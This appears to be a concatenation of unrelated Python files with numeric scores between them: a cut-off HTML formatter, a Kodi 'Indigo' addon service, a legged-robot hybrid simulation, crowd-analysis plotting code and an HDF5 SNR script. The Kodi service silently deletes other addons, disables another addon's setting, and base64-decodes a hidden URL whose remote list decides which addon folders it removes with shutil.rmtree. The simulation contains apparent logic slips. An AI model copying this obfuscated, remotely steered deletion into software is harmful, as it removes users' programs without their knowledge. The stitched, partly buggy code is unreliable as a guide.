profile['tag_nl'] is True should_break = should_break_line(item, profile) # formatting block-level elements if ((item.is_block() or should_break) and item.parent) or force_nl: # snippet children should take different formatting if not item.parent or (item.parent.type != 'snippet' and not is_very_first_child(item)): item.start = get_newline() + padding + item.start if item.has_block_children() or should_break_child(item, profile) or (force_nl and not is_unary): item.end = get_newline() + padding + item.end if item.has_tags_in_content() or (force_nl and not item.has_children() and not is_unary): item.start += get_newline() + padding + get_indentation() elif item.is_inline() and has_block_sibling(item) and not is_very_first_child(item): item.start = get_newline() + padding + item.start item.padding = padding + get_indentation() return item def process(tree, profile, level=0): """ Processes simplified tree, making it suitable for output as HTML structure @type item: ZenNode @type profile: dict @param level: Depth level @type level: int """ for item in tree.children: if item.type == 'tag': item = process_tag(item, profile, level) else: item = process_snippet(item, profile, level) if item.content: item.content = zen_coding.pad_string(item.content, item.padding) process(item, profile, level + 1) return tree
0.038415
import xbmc,xbmcgui,time,os,shutil,re,urllib2 from libs import kodi import support import xbmcaddon import common as Common import base64 addon_id=kodi.addon_id kodi.log('STARTING INDIGO SERVICE') ############################ addonPath=xbmcaddon.Addon(id=addon_id).getAddonInfo('path') addonPath=xbmc.translatePath(addonPath) xbmcPath=os.path.join(addonPath,"..","..") xbmcPath=os.path.abspath(xbmcPath) addonpath = xbmcPath+'/addons/' mediapath = xbmcPath+'/media/' systempath = xbmcPath+'/system/' userdatapath = xbmcPath+'/userdata/' indisettingspath = xbmcPath+'/userdata/addon_data/plugin.program.indigo/settings.xml' packagepath = xbmcPath+ '/addons/packages/' ############################## ############################## oldinstaller =xbmc.translatePath(os.path.join('special://home','addons','plugin.program.addoninstaller')) oldnotify = xbmc.translatePath(os.path.join('special://home','addons','plugin.program.xbmchub.notifications')) oldmain = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.xbmchubmaintenance')) oldwiz = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.hubwizard')) oldfresh = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.freshstart')) oldmain2 = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.hubmaintenance')) try: if os.path.exists(oldinstaller): shutil.rmtree(oldinstaller) if os.path.exists(oldnotify): shutil.rmtree(oldnotify) if os.path.exists(oldmain): shutil.rmtree(oldmain) if os.path.exists(oldwiz): shutil.rmtree(oldwiz) if os.path.exists(oldfresh): shutil.rmtree(oldfresh) except: pass ############################## if xbmc.getCondVisibility('System.HasAddon(script.service.twitter)'): search_string = xbmcaddon.Addon('script.service.twitter').getSetting('search_string') search_string = search_string.replace('from:@','from:') xbmcaddon.Addon('script.service.twitter').setSetting('search_string',search_string) xbmcaddon.Addon('script.service.twitter').setSetting('enable_service','false') ## Start of notifications if kodi.get_setting('hasran')=='true': #kodi.log('Indigo has ran before') TypeOfMessage="t" (NewImage,NewMessage)=Common.FetchNews() Common.CheckNews(TypeOfMessage,NewImage,NewMessage,True) else: kodi.log('Indigo has NOT ran before') ## ################################################## ## ## ################################################## ## ## Start of program support.service_checks() support.scriptblock_checks() ## ################################################## ## ## ################################################## ## if __name__ == '__main__': monitor = xbmc.Monitor() while not monitor.abortRequested(): # Sleep/wait for abort for 10 seconds 12 hours is 43200 1 hours is 3600 if monitor.waitForAbort(1800): # Abort was requested while waiting. We should exit kodi.log('CLOSING INDIGO SERVICES') break if kodi.get_setting ('automain') == 'true': xbmc_cache_path = os.path.join(xbmc.translatePath('special://home'), 'cache') if os.path.exists(xbmc_cache_path)==True: for root, dirs, files in os.walk(xbmc_cache_path): file_count = 0 file_count += len(files) if file_count > 0: for f in files: try: os.unlink(os.path.join(root, f)) except: pass for d in dirs: try: shutil.rmtree(os.path.join(root, d)) except: pass kodi.log('Service could not clear cache') #DO PURGE IS NEEDED kodi.log('Purging Packages') packages_path = xbmc.translatePath(os.path.join('special://home/addons/packages', '')) try: for root, dirs, files in os.walk(packages_path,topdown=False): for name in files : os.remove(os.path.join(root,name)) #kodi.log('Packages Wiped by Service') except: kodi.log('Service could not purge packages') else: pass if kodi.get_setting ('scriptblock') == 'true': kodi.log('Checking for Malicious scripts') BlocksUrl = base64.b64decode('aHR0cDovL2luZGlnby50dmFkZG9ucy5hZy9ibG9ja2VyL2Jsb2NrZXIudHh0') req=urllib2.Request(BlocksUrl) req.add_header('User-Agent', 'Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; AFTB Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') response=urllib2.urlopen(req) link=response.read() response.close() link = link.replace('\n','').replace('\r','').replace('\a','') match=re.compile('block="(.+?)"').findall(link) for blocked in match: addonPath=xbmcaddon.Addon(id=addon_id).getAddonInfo('path') addonPath=xbmc.translatePath(addonPath) xbmcPath=os.path.join(addonPath,"..","..") xbmcPath=os.path.abspath(xbmcPath); addonpath = xbmcPath+'/addons/' try: for root, dirs, files in os.walk(addonpath,topdown=False): if root != addonpath : if blocked in root: shutil.rmtree(root) except: kodi.log('Could not find blocked script')
0.034597
import time, sys, copy import scipy.optimize import numpy.random import pylab import csync from fastode import FastODE from copy import copy as COPY from pdb import set_trace as BREAKPOINT execfile("hybsys.py") FASTODE_CTSLIP = FastODE("ctslip") def plotCircle( xc, yc, r, steps = 36, arc=(-pi,pi), **kw ): """Plot a circle around (xc,yc) with radius r, and specified number of steps in the polygonal approximation""" t = linspace(arc[0],arc[-1],steps) return plot( xc + cos(t)*r, yc+sin(t)*r, **kw ) def plotZigZag( x0, y0, x1, y1, w, N = 7, **kw ): dx = array((x1-x0,y1-y0)) l = sqrt(sum(dx**2.0)) dx = dx/l dy = array((-dx[1],dx[0])) n = arange(0,N+1) ax = concatenate(([0], n/float(N), [1] )) ay = 0.5*concatenate(([0], (-1.0)**n, [0] )) x = ax*l*dx[0] + ay*w*dy[0] + x0 y = ax*l*dx[1] + ay*w*dy[1] + y0 return plot(x,y,**kw) SRC = csync.getSrc("ctslip.c") class CTSLIP_events( csync.FlexSOD ): Fields = csync.getFields(SRC,"CTSLIP_events",2) class CTSLIP_state( csync.FlexSOD ): Fields = ['t']+csync.getFields(SRC,"CTSLIP_state",2) assert len(Fields) == FASTODE_CTSLIP.DIM+1 def upd50_par( self, nm, val ): if not hasattr( val, 'clkTD') or val.clkTD is None: return if val.gravityZ>=0: return # Estimate time 'till touchdown t2td = sqrt( 2 * self.com_z / -val.gravityZ ) # Create clk IC that cancels phase change while falling self.clk = val.clkTD - t2td * val.omega print "[upd] fixed initial clk for clkTD" def upd90_mdl(self, nm, val): x = CTSLIP_aux() y0 = numpy.concatenate( (self[:],zeros(len(x))) ) val.computeAux( y0 ) x.fromArray(y0[len(self):]) # If leg 0 is on COM --> move to ref if self.leg_z_0 == 0 and self.leg_x_0 == 0: self.leg_x_0 = x.ref_x_0 self.leg_z_0 = x.ref_z_0 print "[upd] Locked initial leg 0 position to reference" # if a penetrating stance --> fix it if self.com_z+self.leg_z_0<0: self.leg_x_0 *= abs(self.com_z)/abs(self.leg_z_0) self.leg_z_0 = -self.com_z print "[upd] Initial leg 0 moved to Z=0" # If leg 1 is on COM --> move to ref if self.leg_z_1 == 0 and self.leg_x_1 == 0: self.leg_x_1 = x.ref_x_1 self.leg_z_1 = x.ref_z_1 print "[upd] Locked initial leg 1 position to reference" # if a penetrating stance --> fix it if self.com_z+self.leg_z_0<1: self.leg_x_1 *= abs(self.com_z)/abs(self.leg_z_1) self.leg_z_1 = -self.com_z print "[upd] Initial leg 1 moved to Z=0" return def upd50_plane( self, nm, coef ): """ dot([1,state],coef)-val is the event function coef -- len<5 -- (val, co_clk, co_vx, co_z, co_vz, co_x), zeros appended """ coef = array((list(coef)+[0]*6)[:6],float) if not any(coef): coef[0] = 1000 print "[upd] plane event disabled" else: p = self.par (p.co_value, p.co_clk, p.co_com_vx, p.co_com_z, p.co_com_vz, p.co_com_x) = coef print "[upd] plane is ", coef def getPlane( self ): p = self.par return array([p.co_clk,p.co_com_vx, p.co_com_z,p.co_com_vz, p.co_com_x]) def planeVal( self, dat ): p = self.par co = self.getPlane() dat = asarray(dat) if dat.shape[-1] != len(co): s = CTSLIP_xst() dat = dat[..., [s.clk, s.com_vx, s.com_z, s.com_vz, s.com_x]] return dot(dat,co)+ p.co_value def copy( self ): res = COPY(self) if hasattr(res,'par'): res.par = res.par.copy() return res class CTSLIP_param( csync.FlexSOD ): Fields = csync.getFields(SRC,"CTSLIP_param",2) assert len(Fields) == FASTODE_CTSLIP.NPAR def upd20_stWn( self, nm, val ): self.stK = val*val self.stMu = self.stZeta * 2 * val print "[upd] set stK, stMu from stWn, stZeta" def upd09_hexed( self, nm, val ): tc,dc,phs,ph0,Kp,Kd = val # Omega is 2*pi/(time-of-cycle), but direction is negative! self.omega = -2*pi / tc # Our duty cycle is in radians self.stHalfDuty = dc * pi # Sweep angle is the same self.stHalfSweep = phs/2.0 # Zero angle is "down" for hexed data self.stOfs = ph0-pi/2 # Proportional FB is just like the torsional stiffness # NOTE: for small changes; we use sin(delta) in the eqn self.tqKth = Kp # Given warning if a nonzero Kd is requested if Kd != 0: print "[upd] WARNING: Kd=%g requested by Kd not supported" % Kd print "[upd] applied hextuple ",repr(val) def upd10_stDecayFrac( self, nm, val ): # arc subtended by decay time ang = val * self.stHalfDuty # Natural frequency must finish arc in time self.stWn = abs(self.omega) * (2 * pi / ang) print "[upd] set stWn from stDecayFrac" def upd90_stHalfDuty( self, nm, val ): if val<0 or val>pi: raise ValueError, "Half duty cycle range is 0..PI" if val==0 or val==pi: self.stHalfDuty += 1e-99 print "[upd] fixed invalid stHalfDuty -- don't use 0 and PI!" def copy( self ): return COPY(self) class CTSLIP_aux( csync.FlexSOD ): Fields = csync.getFields(SRC,"CTSLIP_aux",2) assert len(Fields) == FASTODE_CTSLIP.AUX class CTSLIP_xst( csync.FlexSOD ): "Extended state -- includes auxvars" Fields = ( ['t'] + csync.getFields(SRC,"CTSLIP_state",2) + csync.getFields(SRC,"CTSLIP_aux",2) ) assert len(Fields) == FASTODE_CTSLIP.WIDTH def upd_dbg( self, name, val ): print "UPD called" def cfgFromParam( self, pars ): self.vis_R = pars.len0/5 self.vis_W = self.vis_R * 0.75 self.vis_ofs = pars.stOfs if abs(pars.stHalfSweep - pars.stHalfDuty)>0.02: self.vis_swp = pars.stHalfSweep else: self.vis_swp = 0 self.domain = int(pars.domain) def plot( self ): X = self.com_x Z = self.com_z+self.zOfs l = plotCircle( X, Z, self.vis_R, 36, color='k', linewidth=2 ) if self.vis_swp: l.append( plotCircle( X, Z, self.vis_R, 18, arc=(self.vis_ofs-self.vis_swp, self.vis_ofs+self.vis_swp), color=[0.6,0.9,0.6], linewidth=5 )) l.append( plot( [X, X+self.vis_R*1.6*cos(self.clk)], [Z, Z+self.vis_R*1.6*sin(self.clk)], color='m',linewidth= 2 )) for leg in xrange(2): lx = getattr(self,"leg_x_%d"%leg) lz = getattr(self,"leg_z_%d"%leg) rx = getattr(self,"ref_x_%d"%leg) rz = getattr(self,"ref_z_%d"%leg) lc = 'brgmck'[leg] l.append( plot([X+rx],[Z+rz],'d'+lc) ) lkw = { 'color' : lc, 'linewidth' : 2 } if self.domain & (1<<leg): l.extend( plotZigZag( X+lx*0.2, Z+lz*0.2, X+lx*0.8, Z+lz*0.8, self.vis_W, 7, **lkw ) + plot( [X,X+lx*0.2],[Z,Z+lz*0.2], **lkw ) + plot( [X+lx*0.8,X+lx],[Z+lz*0.8,Z+lz], **lkw ) + plot( [X+lx], [Z+lz], '^'+lc ) ) else: l.extend( plot( [X, X+lx], [Z, Z+lz], '-', **lkw ) #+plot( [X+lx], [Z+lz], 'o'+lc ) ) return l class ENUM: def __init__(self, *argv ): self._tbl={} for nm,val in zip(argv,range(len(argv))): setattr(self,nm,val) self._tbl[val]=nm def __len__( self ): return len(self._tbl) def __getitem__(self,key): try: return self._tbl[int(key)] except KeyError: return "UNKNOWN<%d>" % key except ValueError: pass try: return getattr(self,key) except AttributeError: pass if type(key)==int: return key return "UNKNOWN<%s>" % key DomName = ENUM('flyDown','stand0','stand1','both','flyUp') EvtName = ENUM(*CTSLIP_events.Fields) EvtName._tbl[-1] = "(START)" class CTS( HybSys ): F = CTSLIP_xst() P = CTSLIP_param() # Build domain transitions from human readable form TRANS = {} for x in [ 'stand0 lift0 flyUp', 'stand1 lift1 flyUp', 'stand0 land1 both', 'stand1 land0 both', 'both lift0 stand1', 'both lift1 stand0', 'flyDown land0 stand0', 'flyDown land1 stand1', 'stand0 apex stand0', 'stand1 apex stand1', 'both apex both', 'flyUp apex flyDown' ]: src,ev,dst = x.split(" ") TRANS[(DomName[src],EvtName[ev])] = DomName[dst] def __init__(self): HybSys.__init__(self,FASTODE_CTSLIP) self.domDt = [ 1e-3 ] * 5 self.toApex = False self.planeCounter = 0 self.planeTime = -1 self.planeGap = 0.001 self.setGround() def getParam( self ): return CTSLIP_param().fromArray( self.param ) def getICS( self ): return CTSLIP_state().fromArray( self.y[0,:self.ode.DIM+1] ) def integrate(self,*argv,**kwarg): p = self.getParam() assert p.mass > 0, "Params not initialized" assert p.stHalfDuty > 0 and p.stHalfDuty<pi, "Invalid duty cycle" assert all(abs(self.param) < 1e6), "Param range is sane" # Reset plane event latch; only one plane event allowed per domain entry self.planeTime = -1 res = HybSys.integrate(self,*argv,**kwarg) return res def setGround( self, gseq=() ): self.zOfsSeq = list(gseq) self.zOfs = 0 self.zOfsPos = self.csr-1 return self def changeGroundZ( self, state ): # New ground height if self.zOfsSeq: nOfs = self.zOfsSeq.pop(0) dz = nOfs - self.zOfs else: nOfs = self.zOfs dz = 0 # Next stride state[CTS.F.com_z] -= dz self.y[self.zOfsPos:self.csr,CTS.F.zOfs] = self.zOfs # Update ground state self.zOfsPos = self.csr-1 self.zOfs = nOfs def transition(self, dom, evt, state, ev ): res = CTS.TRANS.get((dom,evt),-1) if evt == EvtName.plane: if state[CTS.F.t]-self.planeTime < self.planeGap: #print "<duplicate>", state[CTS.F.t]-self.planeTime res = None else: # process a plane event #print "<plane>", state[CTS.F.t], "dt", state[CTS.F.t]-self.planeTime self.planeTime = state[CTS.F.t] if self.planeCounter > 0: res = dom self.planeCounter -= 1 else: res = -1 # Apex events trigger ground z changes elif evt==EvtName.apex: if self.toApex: res = -1 #elif hasattr(self,'zOfsSeq'): self.changeGroundZ(state) # If transitioned into fly-up if res==DomName.flyUp: # If moving downwards --> silently transition out of fly-up if state[CTS.F.com_vz]<0: res = DomName.flyDown else: # else --> liftoff event, adjust clock phases u = self.param[CTS.P.xiUpdate] c = wrap(state[CTS.F.clk]) r = self.param[CTS.P.xiLiftoff] if c<0: r -= pi state[CTS.F.clk] = c * (1-u) + r * u if res<0: if self.loud>1: print "Termination (%s,%s)-->%s" % (DomName[dom],EvtName[evt],res) return res,state def timesFor(self, dom): return (1000,self.domDt[int(dom)]) def event(self,key): if type(key)!=slice: val = [self.getEvents(key)] else: val = self.getEvents(key) st = CTSLIP_xst() ev = CTSLIP_events() return [ (pos,dom,evt,st.fromArray(st0).toDict(),ev.fromArray(ev0).toDict()) for (pos,dom,evt,st0,ev0) in val ] def narrate( self ): for pos,dom,evt,st,ev in self.getEvents(): print "%-8.5g at %5d %8s --> %s" % ( st[0],pos,DomName[dom],EvtName[evt] ) def plotAt( self, idx ): st = CTSLIP_xst() st.cfgFromParam( CTSLIP_param().fromArray( self.param ) ) if type(idx)==int: if idx<0: idx = [len(self)+idx] else: idx = [idx] if type(idx)==slice: idx=xrange(*idx.indices(len(self))) res = {} for k in idx: st.domain = self.d[k] st.fromArray( self.y[k,:] ) res[k] = st.plot() return res def axisPan( self, idx ): ax = axis() st = CTSLIP_xst() X = self.y[idx,st.com_x] X0 = (ax[0]+ax[1])/2.0 ax =( ax[0]-X0+X, ax[1]-X0+X ) + ax[2:] axis(ax) def energy( self ): s = CTSLIP_xst() p = CTSLIP_param().fromArray(self.param) # Useful subset of samples y = self.y[:self.csr,:] # Reference lengths for legs l0r = sqrt( y[:,s.ref_x_0]**2 + y[:,s.ref_z_0]**2 ) l1r = sqrt( y[:,s.ref_x_1]**2 + y[:,s.ref_z_1]**2 ) # Actual lengths for legs l0 = sqrt( y[:,s.leg_x_0]**2 + y[:,s.leg_z_0]**2 ) l1 = sqrt( y[:,s.leg_x_1]**2 + y[:,s.leg_z_1]**2 ) # Velocity squared v2 = y[:,s.com_vx]**2 + y[:,s.com_vz]**2 # Unit vector along gravity down = numpy.array([p.gravityX,p.gravityZ]) g = norm(down) down = down / g # Height h = -down[0]*y[:,s.com_x]-down[1]*(y[:,s.com_z]+y[:,s.zOfs]) # Kinetic energy ek = 0.5*p.mass*v2 # Gravitational energy eg = p.mass*g*h # Elastic energy el0 = 0.5*p.stK*(l0r-l0)**2 # set to 0 when leg is not in stance numpy.put( el0, self.d[:self.csr] & 1 == 0, 0 ) # Elastic energy el1 = 0.5*p.stK*(l1r-l1)**2 # set to 0 when leg is not in stance numpy.put( el1, self.d[:self.csr] & 1 == 0, 0 ) return numpy.c_[el0+el1+ek+eg,ek,eg,el0,el1,l0r,l0,l1r,l1,sqrt(v2)] def sectionmap( self, args, depth = 1, preslc = slice(None,-1), postslc = slice(1,None), skip=0 ): self.toApex = False pre = [] post = [] vel = [] for arg in args: self.planeCounter = depth self.planeTime = -1 self.mapping( arg ) # Get positions of plane events slc = asarray([ ev[0] for ev in self.getEvents() if (ev[2] == EvtName.plane and ev[1] in [DomName.flyUp, DomName.flyDown] and ev[0] > skip) ]) # Get indices of pre-slice entries prei = slc[preslc] posti = slc[postslc] if not prei or not posti: print "!",#"WARNING: no plane events" continue # Get values at pre, pre+1, post pre0 = self.y[prei,:] delta = self.y[prei+1,:] - pre0 post0 = self.y[posti,:] if 0: print "<>",len(slc),len(self.seq),y0.planeVal(pre0) subplot(211) plot( self.y[slc,s.t], self.y[slc,s.com_vz], '.r') plot( self.x[-1,s.t], self.x[-1,s.com_vz], 'or') plot( self.x[:,s.t], self.x[:,s.com_vz]) plot( pre0[:,s.t], pre0[:,s.com_vz], 'vk') plot( post0[:,s.t], post0[:,s.com_vz], '^y') subplot(212) plot( self.y[slc,s.t], y0.planeVal(self.y[slc,:]), '.r') plot( self.x[:,s.t], y0.planeVal(self.x), ',-' ) plot( pre0[:,s.t], y0.planeVal(pre0), 'vk') plot( post0[:,s.t],y0.planeVal(post0) , '^y') pre.append(pre0) vel.append(delta) post.append(post0) if 0: subplot(211); grid(1) subplot(212); grid(1) print "Found ", len(pre) return ( concatenate(pre,axis=0), concatenate(post,axis=0), concatenate(vel,axis=0) ) def apexMap( self, args ): """ Compute the apex map, penalizing termination due to other events """ self.toApex = True post = self.mapping(args) if self.seq[-1][2] != EvtName.apex: post += 1e5 return post def apexError( self, args ): """ Compute sum-squared error of apex map. First args entry must be clock phase """ idx = [ self.F.clk, self.F.com_vx, self.F.com_z ] post = asarray(self.apexMap(args)) pre = self.x[0,idx] post = self.x[-1,idx] post[0] = post[0] % pi return norm((post-pre)*array([0.1,1,1])) def apexStability( self, args ): assert self.F.clk == self.icsMap[0] assert self.F.clk == self.rtnMap[0] args = asarray(args) args[0] = args[0] % pi post1 = asarray(self.apexMap(args)) post1[0] = post1[0] % pi post2 = asarray(self.apexMap(post1)) post2[0] = post2[0] % pi return norm(post1-args) + norm(post2-post2)/norm(post1-args) def apexFixedPoint( self ): """ Find a nearby fixed-point of the apex map """ ic = concatenate((self.y[0,self.icsMap],self.param[self.parMap])) opt = scipy.optimize.fixed_point( self.apexMap, ic, xtol=1e-5 ) self.useArgs( opt ) return opt def mapseq( self, maxlen=100 ): r = [] while self.seq[-1][2] in [EvtName.apex, EvtName.plane] and len(r)<maxlen: r.append(self.y[0,:].copy()) self.remap() r = array(r) return r # ENDS: class CTS def wrap( ang ): ang = numpy.asarray(ang) return ang - floor((ang+pi)/(2*pi))*(2*pi)
0.037492
#!/usr/bin/env python from subprocess import call import sys,getopt,numpy as np import matplotlib from pylab import *; import swap def make_info_plots(argv): """ NAME make_info_plots PURPOSE Given stage1 and stage2 bureau pickles, this script produces the several plots for the crowd analysis COMMENTS FLAGS -h Print this message INPUTS stage1_bureau.pickle stage2_bureau.pickle OUTPUTS Various png plots. EXAMPLE BUGS - Code is not tested yet... AUTHORS This file is part of the Space Warps project, and is distributed under the MIT license by the Space Warps Science Team. http://spacewarps.org/ HISTORY 2014-06-27 started More & More (Kavli IPMU) """ # ------------------------------------------------------------------ try: opts, args = getopt.getopt(argv,"h",["help"]) except getopt.GetoptError, err: print str(err) # will print something like "option -a not recognized" print make_info_plots.__doc__ # will print the big comment above. return for o,a in opts: if o in ("-h", "--help"): print make_info_plots.__doc__ return else: assert False, "unhandled option" # Check for pickles in array args: if len(args) == 2: bureau1_path = args[0] bureau2_path = args[1] print "make_info_plots: illustrating behaviour captured in bureau files: " print "make_info_plots: ",bureau1_path print "make_info_plots: ",bureau2_path else: print make_info_plots.__doc__ return # Read in bureau objects: bureau1 = swap.read_pickle(bureau1_path, 'bureau') bureau2 = swap.read_pickle(bureau2_path, 'bureau') print "make_info_plots: stage 1, 2 agent numbers: ",len(bureau1.list()), len(bureau2.list()) experience1 = [] effort1 = [] final_skill1 = [] final_PL1 =[] final_PD1 =[] information1 = [] contribution1 = [] experience2 = [] effort2 = [] final_skill2 = [] final_PL2 =[] final_PD2 =[] information2 = [] contribution2 = [] ## Ntrajectory=50 for ID in bureau1.list(): agent = bureau1.member[ID] effort1.append(agent.N-agent.NT) experience1.append(agent.NT) final_skill1.append(agent.traininghistory['Skill'][-1]) final_PL1.append(np.mean(agent.get_PL_realization(Ntrajectory))) final_PD1.append(np.mean(agent.get_PD_realization(Ntrajectory))) information1.append(agent.testhistory['I'].sum()) contribution1.append(agent.testhistory['Skill'].sum()) for ID in bureau2.list(): agent = bureau2.member[ID] effort2.append(agent.N-agent.NT) experience2.append(agent.NT) final_skill2.append(agent.traininghistory['Skill'][-1]) final_PL2.append(np.mean(agent.get_PL_realization(Ntrajectory))) final_PD2.append(np.mean(agent.get_PD_realization(Ntrajectory))) information2.append(agent.testhistory['I'].sum()) contribution2.append(agent.testhistory['Skill'].sum()) ## PL-PD plot def plotplpd(xx,yy,zz,which,ztitle): bins=100; ax=subplot(2,2,which,aspect=1.); hist2d(xx,yy,bins,weights=zz,norm=matplotlib.colors.LogNorm()); cbar=colorbar(); cbar.solids.set_edgecolor("face"); ax.set_xlabel("P$_L$"); ax.set_ylabel("P$_D$"); ax.set_title(ztitle); ax.set_xlim(0,1); ax.set_ylim(0,1); xx=np.arange(-0.1,2,0.1); ax.axhline(0.5,color="k",linestyle='dashed'); ax.axvline(0.5,color="k",linestyle='dashed'); ax.plot(xx,1-xx,color="k"); ########################### ##Users ########################### plotplpd(final_PL1,final_PD1,None,1,"Stage1 Users") plotplpd(final_PL2,final_PD2,None,2,"Stage2 Users") savefig("users_plpd.png") clf(); ########################### ##Effort ########################### plotplpd(final_PL1,final_PD1,effort1,1,"Stage 1 Effort") plotplpd(final_PL2,final_PD2,effort2,2,"Stage 2 Effort") savefig("effort_plpd.png") clf(); ########################### ##Experience ########################### plotplpd(final_PL1,final_PD1,experience1,1,"Stage 1 Experience") plotplpd(final_PL2,final_PD2,experience2,2,"Stage 2 Experience"); savefig("experience_plpd.png") clf(); ########################### ##Contribution ########################### plotplpd(final_PL1,final_PD1,contribution1,1,"Stage 1 Contribution") plotplpd(final_PL2,final_PD2,contribution2,2,"Stage 2 Contribution") savefig("contribution_plpd.png") clf(); ########################### ##Average Information ########################### plotplpd(final_PL1,final_PD1,information1,1,"Stage 1 Information") plotplpd(final_PL2,final_PD2,information2,2,"Stage 2 Information") savefig("information_plpd.png") clf(); ########################### ##Skill PL PD plot ########################### bins=101 skill=np.zeros(bins*bins); skill=np.reshape(skill,(bins,bins)); for ii in range(bins): M_ll=0.01*ii; for jj in range(bins): M_nn=0.01*jj; skill[ii][jj]=swap.expectedInformationGain(0.5, M_ll, M_nn); ax=subplot(1,1,1); im=ax.imshow(skill,origin='lower',extent=(0,1,0,1)); cbar=colorbar(im); cbar.solids.set_edgecolor("face"); ax.set_xlim(0,1); ax.set_ylim(0,1); ax.set_xlabel("P$_L$"); ax.set_ylabel("P$_D$"); ax.set_title("Skill"); xx=np.arange(-0.1,2,0.1); ax.axhline(0.5,color="k",linestyle='dashed'); ax.axvline(0.5,color="k",linestyle='dashed'); ax.plot(xx,1-xx,color="k"); savefig("skill_plpd.png") clf(); ########################### ## Cumulative effort and users vs. skill ########################### bins=100 ax=subplot(2,2,1); hist(final_skill1,bins,cumulative=True,normed=1,color=(0.8,0.2,0.2),histtype='stepfilled',label="Users",range=(0,1)); hist(final_skill1,bins,weights=effort1, cumulative=True,color=(1.0,0.7,0.5),normed=1,histtype='stepfilled',label="Effort",range=(0,1)); ax.set_xlabel("Skill"); ax.set_ylim(0,1.) ax.set_ylabel("Cumulative Fraction"); ax.set_title("Stage 1") legend(loc=4); ax=subplot(2,2,2); hist(final_skill2,bins,cumulative=True,normed=1,color=(0.8,0.2,0.2),histtype='stepfilled',label="Users",range=(0,1)); hist(final_skill2,bins,weights=effort2, cumulative=True,color=(1.0,0.7,0.5),normed=1,histtype='stepfilled',label="Effort",range=(0,1)); ax.set_xlabel("Skill"); ax.set_ylim(0,1.) ax.set_ylabel("Cumulative Fraction"); ax.set_title("Stage 2") legend(loc=4); savefig("skill_effort_users_cum.png") clf(); ########################### ## Training histories of first 20 agents with final skill > 0.5 and <0.5 for Stage 1 and 2 ########################### final_skill1=np.array(final_skill1) idx=(final_skill1>0.5) idxl=(final_skill1<0.5) ax=subplot(2,2,1); ax.set_xscale('log'); ax.set_xlabel("Experience") ax.set_ylabel("Skill") ax.set_title("Stage1") ii=0; for idxx,ID in zip(idx,bureau1.list()): if(ii>20): break; if(not idxx): continue; agent = bureau1.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="green", alpha=0.2, linewidth=2.0, linestyle="-") ax.scatter(N[-1], I[-1], color="green", alpha=0.5) ii=ii+1 ii=0; for idxx,ID in zip(idxl,bureau1.list()): if(ii>20): break; if(not idxx): continue; agent = bureau1.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="red", alpha=0.2, linewidth=2.0, linestyle="-") ax.scatter(N[-1], I[-1], color="red", alpha=0.5) ii=ii+1 final_skill2=np.array(final_skill2) idx=(final_skill2>0.5) idxl=(final_skill2<0.5) ax=subplot(2,2,2); ax.set_xscale('log'); ax.set_xlabel("Experience") ax.set_ylabel("Skill") ax.set_title("Stage2") for idxx,ID in zip(idx,bureau2.list()): if(not idxx): continue; agent = bureau2.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="green", alpha=0.2, linewidth=2.0, linestyle="-") ax.scatter(N[-1], I[-1], color="green", alpha=0.5) ii=0; for idxx,ID in zip(idxl,bureau2.list()): if(ii>20): break; if(not idxx): continue; agent = bureau2.member[ID] I = agent.traininghistory['Skill'] N = np.linspace(1, len(I), len(I), endpoint=True) # Information contributions: ax.plot(N, I, color="red", alpha=0.2, linewidth=2.0, linestyle="-") ax.scatter(N[-1], I[-1], color="red", alpha=0.5) ii=ii+1 tight_layout(); savefig("skill_experience.png") clf(); ########################### ## function to plot 2d histograms ########################### def plothist2d(xx,yy,zz,which,xlab,ylab,ztitle): bins=100; ax=subplot(2,2,which); xx=np.array(xx) yy=np.array(yy) zz=np.array(zz) idx=np.where(xx>0) hist2d(np.log10(xx[idx]),yy[idx],bins,weights=zz[idx],norm=matplotlib.colors.LogNorm()); cbar=colorbar(); cbar.solids.set_edgecolor("face"); ax.set_xlabel(xlab); ax.set_ylabel(ylab); ax.set_title(ztitle); ########################### ## Contribution as a function of experience vs. skill ########################### plothist2d(experience1,final_skill1,contribution1,1,"Log(Experience)","Skill","Stage 1 Contribution") plothist2d(experience2,final_skill2,contribution2,2,"Log(Experience)","Skill","Stage 2 Contribution") savefig("experience_skill_contribution.png") clf(); ########################### ## Contribution as a function of effort vs. skill ########################### plothist2d(effort1,final_skill1,contribution1,1,"Log(Effort)","Skill","Stage 1 Contribution") plothist2d(effort2,final_skill2,contribution2,2,"Log(Effort)","Skill","Stage 2 Contribution") savefig("effort_skill_contribution.png") clf(); if __name__ == '__main__': make_info_plots(sys.argv[1:])
0.03679
"""Read the time series and output a csv""" import argparse import h5py import csv import sys import numpy as np parser = argparse.ArgumentParser( __doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument( "file", nargs=1, help="hdf5 file" ) if __name__ == '__main__': args = parser.parse_args() file_name = args.file[0] hdf5_file = h5py.File(file_name, "r") hdf5_group = hdf5_file["raw_images"] writer = csv.writer(sys.stdout) exposures = [0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1] n_files = [1000, 1000, 1000, 500, 500, 500, 200, 200, 200, 100] writer.writerow(["exposure", "signal", "noise", "snr"]) datasets = np.array([dataset for dataset in hdf5_group.values()]) print(datasets.shape) i = 0 for exposure, n in zip(exposures, n_files): dataset = datasets[i:(i + n), 0, ...] print(dataset.shape) i += n signal = np.mean(dataset, axis=0) noise = np.std(dataset, axis=0) snr = signal / noise writer.writerow([exposure, signal, noise, snr]) hdf5_file.close()
0
